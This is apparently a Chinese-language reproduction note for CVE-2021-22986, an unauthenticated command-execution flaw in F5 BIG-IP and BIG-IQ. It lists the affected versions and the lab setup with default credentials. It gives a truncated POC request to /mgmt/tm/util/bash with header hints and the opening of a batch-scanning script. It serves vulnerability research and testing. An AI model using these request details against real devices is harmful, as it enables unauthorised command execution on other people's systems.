漏洞简介
F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。
该平台可在未登陆账号情况下执行系统命令。漏洞编号为CVE-2021-22986
影响范围
16.0.0 <= BIG-IP <= 16.0.1
15.1.0 <= BIG-IP <= 15.1.2
14.1.0 <= BIG-IP <= 14.1.3.1
13.1.0 <= BIG-IP <= 13.1.3.5
12.1.0 <= BIG-IP <= 12.1.5.2
7.1.0 <= BIG-IQ <= 7.1.0.2
7.0.0 <= BIG-IQ <= 7.0.0.1
6.0.0 <= BIG-IQ <= 6.1.0
漏洞复现
环境下载地址:
https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2
此处下载14.1.2.8版本
用vmware打开,账号密码为root/default,之后用config命令配置网络。
该平台默认用户名为admin,密码为系统root的密码,输入密码后并修改密码即可完成部署。
POC:
1 | POST /mgmt/tm/util/bash HTTP/1.1 |
其中Authorization的值为系统的用户名,默认为admin的base64编码。X-F5-Auth-Token头是必加的。
批量检测:
1 | import requests |